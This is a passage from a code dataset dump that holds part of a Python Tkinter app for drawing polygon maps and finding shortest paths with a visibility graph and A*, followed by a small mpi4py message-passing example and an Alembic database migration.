10\n\nMAP_WIDTH = WIDTH // TILE_SIZE\nMAP_HEIGHT = HEIGHT // TILE_SIZE\n\n# Mutable states ##############################################################\n\nstart_pos = ()\nend_pos = ()\nresult_path = []\nmap = [] \ngraph = {}\n\nstate = State.IDLE\n\n# Tkinter widgets #############################################################\n\ndef App():\n window = tk.Tk(className=\"pathfinding\")\n window.title(\"Pathfinding\")\n window.resizable(False, False)\n\n global NORMAL_FONT, BOLD_FONT\n NORMAL_FONT = font.Font(size=FONT_SIZE, weight='normal')\n BOLD_FONT = font.Font(size=FONT_SIZE, weight='bold')\n\n root = tk.Frame(window).pack()\n\n config_menu = tk.Frame(root)\n config_menu.pack(padx=PADDING / 2, pady=PADDING, fill='x')\n\n map_menu = tk.Frame(config_menu)\n map_menu.pack(side=tk.LEFT, expand=1, anchor='w')\n\n global map_name\n map_name = tk.StringVar()\n tk.Entry(map_menu, textvariable=map_name).pack(side=tk.LEFT, padx=PADDING / 2)\n\n tk.Button(map_menu, text='Save', font=NORMAL_FONT, command=save_map).pack(side=tk.LEFT, padx=PADDING / 2)\n tk.Button(map_menu, text='Load', font=NORMAL_FONT, command=load_map).pack(side=tk.LEFT, padx=PADDING / 2)\n tk.Button(map_menu, text='Edit', font=NORMAL_FONT, command=edit_map).pack(side=tk.LEFT, padx=PADDING / 2)\n tk.Button(map_menu, text='Random', font=NORMAL_FONT, command=random_map).pack(side=tk.LEFT, padx=PADDING / 2)\n\n points_menu = tk.Frame(config_menu)\n points_menu.pack(side=tk.LEFT, expand=1, anchor='e')\n\n tk.Button(points_menu, text=\"Edit\", font=NORMAL_FONT, command=edit_points).pack(side=tk.LEFT, padx=PADDING / 2)\n\n global start_label\n start_label = tk.Label(points_menu, text=\"start = {...; ...}\", font=NORMAL_FONT)\n start_label.pack(side=tk.LEFT, padx=PADDING / 2)\n\n global end_label\n end_label = tk.Label(points_menu, text=\"end = {...; ...}\", font=NORMAL_FONT)\n end_label.pack(side=tk.LEFT, padx=PADDING / 2)\n\n global canvas\n canvas = tk.Canvas(root, bg=\"#ffffff\", width=WIDTH, height=HEIGHT)\n canvas.config(cursor='none')\n canvas.pack(padx=PADDING)\n\n canvas.bind('', canvas_motion)\n canvas.bind('', canvas_click)\n\n result_menu = tk.Frame(root)\n result_menu.pack(padx=PADDING / 2, pady=PADDING, side=tk.LEFT, anchor='w')\n\n global show_graph\n show_graph = tk.BooleanVar()\n show_graph.trace_add(\"write\", lambda *_: render())\n tk.Checkbutton(result_menu, text=\"Show graph\", variable=show_graph, onvalue=True, offvalue=False).pack(side=tk.RIGHT, padx=PADDING / 2)\n\n global distance_label\n distance_label = tk.StringVar(value=\"Distance: ...\")\n tk.Label(result_menu, textvariable=distance_label, font=NORMAL_FONT).pack(side=tk.LEFT, padx=PADDING / 2)\n\n global time_label\n time_label = tk.StringVar(value=\"Time: ...\")\n tk.Label(result_menu, textvariable=time_label, font=NORMAL_FONT).pack(side=tk.LEFT, padx=PADDING / 2)\n\n init_shapes()\n render()\n return window\n\n# Rendering ###################################################################\n\ndef draw_dot(pos, color, tag):\n dot_start_x = pos[0] - DOT_RADIUS\n dot_start_y = pos[1] - DOT_RADIUS\n\n dot_end_x = pos[0] + DOT_RADIUS\n dot_end_y = pos[1] + DOT_RADIUS\n\n canvas.create_oval(dot_start_x, dot_start_y, dot_end_x, dot_end_y, fill=color, outline='', tags=tag)\n\n\ndef align_point(x, y):\n aligned_x = round(x / TILE_SIZE) * TILE_SIZE\n aligned_y = round(y / TILE_SIZE) * TILE_SIZE\n return aligned_x, aligned_y\n\n\ndef draw_lines(points, fill, width, tag):\n canvas.delete(tag)\n last = ()\n for point in points:\n draw_dot(point, fill, tag)\n if last:\n canvas.create_line(last, point, fill=fill, width=width, tags=tag)\n\n last = point\n\n\ndef init_shapes():\n global poly\n poly = canvas.create_polygon([0, 0], fill=Color.POLYGON, outline='')\n\n # Draw the grid\n for i in range(MAP_WIDTH + 1):\n canvas.create_line(i * TILE_SIZE, 0, i * TILE_SIZE, HEIGHT, width=1, fill=Color.GRID)\n\n for i in range(MAP_HEIGHT + 1):\n canvas.create_line(0, i * TILE_SIZE, WIDTH, i * TILE_SIZE, width=1, fill=Color.GRID)\n\n\ndef render():\n global start_pos, end_pos, poly\n\n if state != State.EDIT_MAP and len(map) > 0:\n canvas.coords(poly, sum([[i[0], i[1]] for i in map], []))\n else:\n canvas.coords(poly, [0, 0])\n\n canvas.delete('graph')\n if state != State.EDIT_MAP and show_graph.get():\n for e1 in graph:\n pos1 = start_pos if e1 == -1 else end_pos if e1 == -2 else map[e1]\n for e2 in graph[e1]:\n if e1 < e2 or e2 == -2:\n pos2 = start_pos if e2 == -1 else end_pos if e2 == -2 else map[e2]\n \n if pos1 and pos2:\n canvas.create_line(pos1, pos2, fill=Color.GRAPH, width=1, tags='graph')\n \n draw_lines(map, Color.MAP, 3, 'map_outline')\n\n draw_lines(result_path, Color.LINE, 3, 'result_path')\n\n canvas.delete('start-end')\n if start_pos:\n draw_dot(start_pos, Color.START, 'start-end')\n if end_pos:\n draw_dot(end_pos, Color.END, 'start-end')\n\n\ndef draw_cursor(x, y):\n canvas.delete(\"cursor\")\n if state == State.IDLE:\n dot_color = Color.CURSOR\n elif state == State.EDIT_START:\n dot_color = Color.START if in_polygon(x, y) else Color.CURSOR\n elif state == State.EDIT_END:\n dot_color = Color.END if in_polygon(x, y) else Color.CURSOR\n elif state == State.EDIT_MAP:\n x_tiled = round(x / TILE_SIZE) * TILE_SIZE\n y_tiled = round(y / TILE_SIZE) * TILE_SIZE\n tiled_pos = (x_tiled, y_tiled)\n dot_color = Color.PREVIEW\n if map:\n canvas.create_line(map[0], tiled_pos, fill=Color.PREVIEW, width=3, tags='cursor')\n canvas.create_line(map[-1], tiled_pos, fill=Color.PREVIEW, width=3, tags='cursor')\n\n if len(map) > 2 and tiled_pos == map[0]:\n draw_dot(tiled_pos, Color.START, 'cursor')\n elif tiled_pos in map:\n draw_dot(tiled_pos, Color.END, 'cursor')\n else:\n draw_dot(tiled_pos, Color.PREVIEW, 'cursor')\n else:\n draw_dot(tiled_pos, Color.PREVIEW, 'cursor')\n else:\n raise Exception('Unreachable')\n draw_dot((x, y), dot_color, 'cursor')\n\n# Geometry ####################################################################\n\n\n@njit\ndef distance(a, b):\n xa, ya = a\n xb, yb = b\n dx = xa - xb\n dy = ya - yb\n return sqrt(dx * dx + dy * dy)\n\n\n@njit\ndef orientation(a, b, c):\n xa, ya = a\n xb, yb = b\n xc, yc = c\n val = (yb - ya) * (xc - xb) - (xb - xa) * (yc - yb)\n return 1 if val > 0 else 2 if val < 0 else 0\n\n\n@njit\ndef on_segment(a, b, c):\n xa, ya = a\n xb, yb = b\n xc, yc = c\n return xb <= max(xa, xc) and xb >= min(xa, xc) and yb <= max(ya, yc) and yb >= min(ya, yc)\n\n\n@njit\ndef intersect(p1, q1, p2, q2):\n o1 = orientation(p1, q1, p2)\n o2 = orientation(p1, q1, q2)\n o3 = orientation(p2, q2, p1)\n o4 = orientation(p2, q2, q1)\n\n if o1 != o2 and o3 != o4:\n return True\n\n if o1 == 0 and on_segment(p1, p2, q1):\n return True\n\n if o2 == 0 and on_segment(p1, q2, q1):\n return True\n\n if o3 == 0 and on_segment(p2, p1, q2):\n return True\n\n if o4 == 0 and on_segment(p2, q1, q2):\n return True\n\n return False\n\n\ndef in_polygon(x, y):\n inside = False\n for i in range(len(map) - 1):\n x1, y1 = map[i]\n x2, y2 = map[i + 1]\n\n if (y1 > y2):\n x1, x2 = x2, x1\n y1, y2 = y2, y1\n\n # Check collision with horizontal line to the right of (x, y)\n if y > y1 and y <= y2 and x <= x1 + (x2 - x1) * (y - y1) / (y2 - y1):\n inside = not inside\n \n return inside \n\n# Graph generation ############################################################\n\ndef add_edge(idx1, idx2, pos1, pos2, rev):\n xi, yi = pos1\n xj, yj = pos2\n\n # In case it doesn't intersect with any polygon edge, discard if the\n # midpoint is outside of the polygon\n if not in_polygon((xi + xj) / 2, (yi + yj) / 2):\n return\n\n is_intersect = False\n \n for k in range(len(map) - 1):\n k1 = (k + 1) % (len(map) - 1)\n if k == idx1 or k == idx2 or k1 == idx1 or k1 == idx2:\n continue\n if intersect(pos1, pos2, map[k], map[k1]):\n is_intersect = True\n break\n\n if not is_intersect:\n dx, dy = xj - xi, yj - yi\n w = sqrt(dx * dx + dy * dy)\n \n if idx1 not in graph:\n graph[idx1] = {}\n\n graph[idx1][idx2] = w\n \n if rev:\n if idx2 not in graph:\n graph[idx2] = {}\n\n graph[idx2][idx1] = w\n\n\ndef generate_graph():\n global graph\n graph = {}\n \n for i in range(len(map) - 1):\n # All polygon edges are also edges of visibility graph\n j = (i + 1) % (len(map) - 1)\n w = distance(map[i], map[j])\n \n if i not in graph:\n graph[i] = {}\n\n if j not in graph:\n graph[j] = {}\n\n graph[i][j] = graph[j][i] = w\n\n for j in range(i + 2, len(map) - 1):\n add_edge(i, j, map[i], map[j], True)\n\n# Pathfinding ################################################################# \n\ndef pathfind():\n global result_path\n start_time = perf_counter()\n if not start_pos or not end_pos:\n return\n\n n = len(map) - 1\n\n # Add the start and end node to the visibility graph\n for i in range(n):\n p = map[i]\n add_edge(-1, i, start_pos, p, False)\n add_edge(i, -2, p, end_pos, False)\n add_edge(-1, -2, start_pos, end_pos, False)\n\n g = [INF] * n # g(x) = smallest distance from start to x\n h = [0.0] * n # h(x) = estimated cost to travel from x to end\n f = [INF] * n # f(x) = g(x) + h(x)\n p = [-3] * n # the parent of a node in the final path\n\n # Use euclidean distance to calculate h(x)\n for i in range(n):\n h[i] = distance(map[i], end_pos)\n\n # NOTE: switch to a binary heap to improve performance\n open = PriorityQueue()\n\n g_end = INF\n p_end = -3\n open_end = False\n\n # Basic A* implementation\n for adj in graph[-1]:\n if adj != -2:\n dist = graph[-1][adj]\n if dist < g[adj]:\n g[adj] = dist\n f[adj] = dist + h[adj]\n p[adj] = -1\n open.put((f[adj], adj))\n else:\n if graph[-1][-2] < g_end:\n g_end = graph[-1][-2]\n open_end = True\n p_end = -1\n\n while True:\n f_v, v = open.get()\n \n if open_end and g_end < f_v:\n break\n\n for adj in graph[v]:\n dist = g[v] + graph[v][adj]\n if adj != -2:\n if dist < g[adj]:\n g[adj] = dist\n f[adj] = dist + h[adj]\n p[adj] = v\n open.put((f[adj], adj))\n else:\n if dist < g_end:\n g_end = dist\n open_end = True\n p_end = v\n \n # Path reconstruction\n result_path = [end_pos]\n last = p_end\n\n while last != -1:\n result_path.append(map[last])\n last = p[last]\n \n result_path.append(start_pos)\n\n end_time = perf_counter()\n elapsed_time = (end_time - start_time) * 1000\n distance_label.set(f\"Distance: {g_end / TILE_SIZE:.2f}\")\n time_label.set(f\"Time: {elapsed_time:.2f}ms\")\n\n# Random map generation #######################################################\n\n@njit\ndef shuffle(a):\n for i in range(len(a)):\n idx = randrange(len(a))\n a[i], a[idx] = a[idx], a[i]\n\n\n@njit\ndef gen_poly(w, h, d=0.2):\n c = int((w - 1) * (h - 1) * d * d)\n\n vl = [(i, j) for i in range(1, w) for j in range(1, h)]\n shuffle(vl)\n vl = vl[:c]\n\n x = [i[0] for i in vl]\n y = [i[1] for i in vl]\n\n found = True \n while found:\n found = False\n for i in range(c - 1):\n if found:\n break\n\n for j in range(i + 2, c):\n if i == 0 and j == c - 1:\n continue\n i1, j1 = i + 1, (j + 1) % c\n p1 = (x[i], y[i])\n p2 = (x[i1], y[i1])\n p3 = (x[j], y[j])\n p4 = (x[j1], y[j1])\n\n if distance(p1, p2) + distance(p3, p4) > distance(p1, p3) + distance(p2, p4):\n found = True\n x[i + 1:j + 1] = x[j:i:-1]\n y[i + 1:j + 1] = y[j:i:-1]\n break\n\n res = []\n\n for i in range(c):\n p = (x[i] * TILE_SIZE, y[i] * TILE_SIZE)\n if len(res) > 1 and orientation(res[-2], res[-1], p) == 0:\n res.pop()\n res.append(p)\n \n if len(res) > 2 and orientation(res[-1], res[0], res[1]) == 0:\n res.pop(0)\n\n res.append(res[0])\n\n return res\n\n# Events ######################################################################\n\ndef reset():\n global start_pos, end_pos, result_path, graph\n start_pos = ()\n end_pos = ()\n result_path = []\n\n # Remove start and end from visibility graph\n if -1 in graph:\n del graph[-1]\n for e in graph:\n if -2 in graph[e]:\n del graph[e][-2]\n\n\ndef display_pos(pos, name):\n x, y = pos\n return f\"{name} = {{{x/TILE_SIZE:.2f}; {y/TILE_SIZE:.2f}}}\"\n\n\ndef canvas_motion(e):\n if state == State.EDIT_START:\n start_pos = (e.x, e.y)\n start_label.config(text=display_pos(start_pos, \"start\"), font=BOLD_FONT)\n elif state == State.EDIT_END:\n end_pos = (e.x, e.y)\n end_label.config(text=display_pos(end_pos, \"end\"), font=BOLD_FONT)\n\n draw_cursor(e.x, e.y)\n\n\ndef canvas_click(e):\n global start_pos, end_pos, state\n if state == State.EDIT_START and in_polygon(e.x, e.y):\n start_pos = (e.x, e.y)\n start_label.config(text=display_pos(start_pos, \"start\"),\n font=NORMAL_FONT)\n end_label.config(text=\"end = {...; ...}\", font=BOLD_FONT)\n end_label.cget('font')\n state = State.EDIT_END\n elif state == State.EDIT_END and in_polygon(e.x, e.y):\n end_pos = (e.x, e.y)\n end_label.config(text=display_pos(end_pos, \"end\"), font=NORMAL_FONT)\n pathfind()\n state = State.IDLE\n \n # Map editor\n elif state == State.EDIT_MAP:\n tiled_pos = align_point(e.x, e.y)\n\n if map:\n # Remove nodes by clicking it\n if tiled_pos in map and (len(map) == 1 or tiled_pos != map[0]):\n while map[-1] != tiled_pos:\n map.pop()\n map.pop()\n else:\n # Prevent self-intersecting polygons\n is_intersect = False\n for k in range(len(map) - 2):\n if tiled_pos == map[0] and k == 0:\n continue\n if intersect(map[-1], tiled_pos, map[k], map[k + 1]):\n is_intersect = True\n break\n\n if not is_intersect:\n if len(map) > 2:\n # Join colinear edges to lower edge count\n if orientation(map[-2], map[-1], tiled_pos) == 0:\n map.pop()\n\n # Finish editing by clicking the first node\n if tiled_pos == map[0]:\n if orientation(map[-1], map[0], map[1]) == 0:\n map.pop(0)\n\n map.append(map[0])\n state = State.IDLE\n global graph\n generate_graph()\n else:\n map.append(tiled_pos)\n elif tiled_pos != map[0]:\n map.append(tiled_pos)\n else:\n map.append(tiled_pos)\n\n render()\n draw_cursor(e.x, e.y)\n\ndef edit_points():\n global start_pos, end_pos, state, result_path\n if state == State.IDLE and len(map) > 3:\n reset()\n render()\n start_label.config(text=\"start = {...; ...}\", font=BOLD_FONT)\n end_label.config(text=\"end = {...; ...}\")\n\n distance_label.set(\"Distance: ...\")\n time_label.set(\"Time: ...\")\n state = State.EDIT_START\n\n\ndef save_map():\n global state\n if state == State.IDLE:\n if not path.exists('maps'):\n mkdir('maps')\n name = \"maps/\" + map_name.get() + \".mp\"\n with open(name, 'w') as f:\n for point in map:\n x, y = point\n f.write(f\"{x // TILE_SIZE} {y // TILE_SIZE}\\n\")\n\n\ndef load_map():\n global state, graph\n if state == State.IDLE:\n if not path.exists('maps'):\n mkdir('maps')\n\n name = \"maps/\" + map_name.get() + \".mp\"\n map.clear()\n reset()\n with open(name, 'r') as f:\n for line in f.readlines():\n x, y = (int(i) for i in line.split())\n map.append((x * TILE_SIZE, y * TILE_SIZE))\n generate_graph()\n render()\n\n\ndef edit_map():\n global state\n if state == State.IDLE:\n reset()\n if map:\n map.pop()\n state = State.EDIT_MAP\n render()\n\n\ndef random_map():\n global state, map, graph\n if state == State.IDLE:\n reset()\n map = gen_poly(MAP_WIDTH, MAP_HEIGHT, 0.5)\n generate_graph()\n render()\n\n# Entrypoint ##################################################################\n\nif __name__ == \"__main__\":\n App().mainloop()\n","repo_name":"ziap/pathfinding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73587278935","text":"from mpi4py import MPI\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nn_processors = comm.Get_size()\n\nif rank != 0:\n message = \"Hello from process \" + str(rank)\n comm.send(message, dest=0)\nelse:\n\tfor pid in range(1, n_processors):\n\t\tmessage = comm.recv(source=pid)\n\t\tprint(\"Process 0 receives message from process {}: {}\".format(pid, message))\n","repo_name":"aubreyomondi/distributed_objects_labs","sub_path":"mpi_exercise/mpi_B.py","file_name":"mpi_B.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16487463703","text":"\"\"\"add topic_id to topic\n\nRevision ID: e2180472f6d1\nRevises: 0d6f972ccc6a\nCreate Date: 2021-07-12 20:53:48.763055\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e2180472f6d1'\ndown_revision = '0d6f972ccc6a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('topic', sa.Column('topic_id', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('topic', 'topic_id')\n # ### end Alembic commands ###\n","repo_name":"4hsinyili/0723_demo_hsinyili","sub_path":"Migration/versions/e2180472f6d1_add_topic_id_to_topic.py","file_name":"e2180472f6d1_add_topic_id_to_topic.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}